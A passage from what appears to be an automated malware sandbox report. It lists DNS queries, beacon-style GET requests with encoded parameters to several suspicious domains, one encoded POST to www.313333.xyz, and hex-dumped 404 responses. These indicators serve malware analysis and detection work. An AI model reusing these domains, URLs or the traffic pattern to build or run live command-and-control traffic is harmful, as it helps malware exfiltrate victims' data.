Source: global traffic	HTTP traffic detected: GET /wdm1/?Cpbp2=zjh46zEHi&gnlxDxt=+lDhQwjcqciYGoyMlAmqcMzIngJLQFU8yJeyXm7/HR5vK2UrnZr15LQFOKrK4FY+rjusngfyUMfjWLDl7Hie+r5rQKPTgM+Sd/Dx7kDur+5/ev3d9JlPdbQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mosquitoxp.lolConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
Source: global traffic	HTTP traffic detected: GET /0hqe/?gnlxDxt=DKA1iVPcoZUjyp2kMNYgPydN8TVlv2BCRXxU2Kub3rtTiJbt+pfDiXzRopvp7VMLzDHcJo8PeW6VBgWmqyKjijxSdggTsAG5c4hPlmGpc/Wen6gVL7B2F3s=&Cpbp2=zjh46zEHi HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mzkd6gp5.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
Source: global traffic	HTTP traffic detected: GET /sjh2/?gnlxDxt=YkJjGs4lbp5ts7eeq38ve60glEoSeBv7n+jiAmf9K/aJhMvSfAmkEslPX5dpK+rGqB8Vqcj9eGPLpji1qr6bjKpF389iooxy/bfE0yZvpr3FHFNGtOhSTJw=&Cpbp2=zjh46zEHi HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.epayassist.netConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
Source: global traffic	HTTP traffic detected: GET /mjln/?gnlxDxt=mRd2QOrZow0Zy8rcEJSXGRznkeTfTdv0yZ2YG4FUDMPe/4koX4+1ymts9nnhEJy5dYKCFioRx0Zy3sftYsziig07/zAt0ecRqm4eM3zYCvLGPFaM+s8J2dY=&Cpbp2=zjh46zEHi HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.grimbo.boatsConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
Source: global traffic	HTTP traffic detected: GET /0cbv/?Cpbp2=zjh46zEHi&gnlxDxt=1lixiFn2nPh88HonPghJDFAFcnnzyrdvNvLcEc2wPpGyfhd+75GCEpQKEfA1MXagijVYaOCU2MEqrz5pMxxhEIji4Qs6Ro2dwyRTrjDFXU7ZlJam3DSGN9g= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.balanpoint.lifeConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
Source: global traffic	HTTP traffic detected: GET /jh0k/?gnlxDxt=cE+iwc0yj830uuhklCcrX/wOzR3WnF1m5/XKwWZdu8qZVYJFuXJD1Zapdap+RxDw3ImSWqBjcd0u94ZA4St+7Z5LUmDNQvXJfTb2ufMRWduIOzpab4DfT5A=&Cpbp2=zjh46zEHi HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.erexolsk.shopConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)

Source: global traffic	DNS traffic detected: DNS query: www.wuyyv4tq.top
Source: global traffic	DNS traffic detected: DNS query: www.313333.xyz
Source: global traffic	DNS traffic detected: DNS query: www.mosquitoxp.lol
Source: global traffic	DNS traffic detected: DNS query: www.mzkd6gp5.top
Source: global traffic	DNS traffic detected: DNS query: www.epayassist.net
Source: global traffic	DNS traffic detected: DNS query: www.grimbo.boats
Source: global traffic	DNS traffic detected: DNS query: www.balanpoint.life
Source: global traffic	DNS traffic detected: DNS query: www.erexolsk.shop

Source: unknown

HTTP traffic detected: POST /5jna/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.313333.xyzOrigin: http://www.313333.xyzCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 204Referer: http://www.313333.xyz/5jna/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)Data Raw: 67 6e 6c 78 44 78 74 3d 6c 2b 75 51 46 32 47 61 49 59 5a 56 67 4f 53 49 6c 75 68 39 54 4c 6d 59 49 4d 30 51 4f 54 6f 77 64 70 56 56 62 52 57 76 6c 33 6b 68 44 52 52 59 73 43 52 57 70 65 61 69 50 4c 61 76 78 47 61 38 4b 58 49 42 35 43 4a 69 37 44 43 6c 57 41 4e 68 35 35 62 67 74 4b 65 33 54 6f 48 77 44 57 56 66 32 79 78 44 46 79 46 49 34 61 58 56 52 73 4f 66 58 49 46 4f 4e 46 6b 4f 39 36 44 74 74 7a 76 70 36 59 70 59 6c 48 64 6c 59 61 52 44 74 63 6d 4a 42 70 74 76 6a 50 67 42 6a 68 37 76 63 55 58 4d 6a 6f 34 69 64 6c 63 6c 32 55 6a 61 6c 56 71 76 54 41 33 30 72 2f 37 7a 33 44 4b 64 65 6a 6a 58 70 67 3d 3d Data Ascii: gnlxDxt=l+uQF2GaIYZVgOSIluh9TLmYIM0QOTowdpVVbRWvl3khDRRYsCRWpeaiPLavxGa8KXIB5CJi7DClWANh55bgtKe3ToHwDWVf2yxDFyFI4aXVRsOfXIFONFkO96Dttzvp6YpYlHdlYaRDtcmJBptvjPgBjh7vcUXMjo4idlcl2UjalVqvTA30r/7z3DKdejjXpg==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Dec 2024 03:50:44 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 03:50:52 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 64 6d 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wdm1/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 03:50:55 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 64 6d 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wdm1/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 03:50:58 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 64 6d 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wdm1/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 03:51:01 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 64 6d 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wdm1/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 03:51:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=btpgPfwJtTDsT4%2Fm0CJzRCd7R9DMZMlMycl%2FpT%2BnPexrCz5GQ3fLUEMzhKd%2Fz%2FzWmBS%2FojWv7pO5AsliUky74uR9Oo00sB2y7g3CIGl97KKXOdM7TB%2BLaEoI2ZBslzJ6107B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f028430bdb9728c-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2027&min_rtt=2027&rtt_var=1013&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=803&delivery_rate=0&cwnd=155&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 03:51:31 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c8%2F5kJjrBmek715l2SyUKPjYGc%2Fyb9f3b%2B2uowfXD%2BnYKwH5UohBMkVU6JzvNhI%2B9%2BbPgazFRr%2B%2FDK2qeOmuELlWZyedVgs9wMiLsXZnMf3vBHoLdPKRbw8INlne3Yze566T"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f02844159ac19cb-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2048&min_rtt=2048&rtt_var=1024&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=823&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 03:51:33 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VxvZzdny1OjFc0eiEvBQcFx%2B%2B6xr55Y%2F9G%2BRI4lae%2BvGQL8W8EpdeWbGWLy%2FM0%2Fz6MxiCmqb1RXzBxQHOH8xFUKNS4xOaQxcdstuMbFRjAircETNKKhGScyGO1JGNEVvHgd0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f0284520bb98cca-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2010&min_rtt=2010&rtt_var=1005&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10905&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 03:51:36 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q7mTnvEFmMTmwC4v9X3EfT64V60aSnizi2%2FeBU3yJ2V4JWnP3%2BlJhHIhziMH9uTq2CeYocS0tEZlhlxHxkcMSaWIN1iY%2BZUqF5MIrMfUQvPsBpKSjkMERmwIs0lYScXiZ7Bm"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f0284629b13de96-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1480&min_rtt=1480&rtt_var=740&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=538&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 03:51:58 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n2ZDdT9xQBNKZ6YeB3NBLmZAV4Ok2M99AVA6pozXul20iPi8hizs7e1S%2BmP9%2FMjHezcaqwj%2BbhARk8hu6idLPpLi2DlaJUL1LReeIR%2FzZ5BQEf5ICUhxlFgVVWKTl%2BWxHjOS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f0284ee2c730fab-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1667&rtt_var=833&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=803&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6\| )(A`cTO>9CM;<qfI~zz*Al$\^U0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 03:52:01 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lLZCTO1%2FGPsTsbDggEnIgWm026WDrs4jizTyKqBSl6M4GSXs5MYh7jthEvFr6Wo4f2D92IdvoICqZYiL2phRfYPzNwfcUOcOGsGb29hcXfnLRA1lF4Si9Ntaand%2FHu93MA%2BK"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f0284fecaa7422f-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2028&min_rtt=2028&rtt_var=1014&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=823&delivery_rate=0&cwnd=135&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 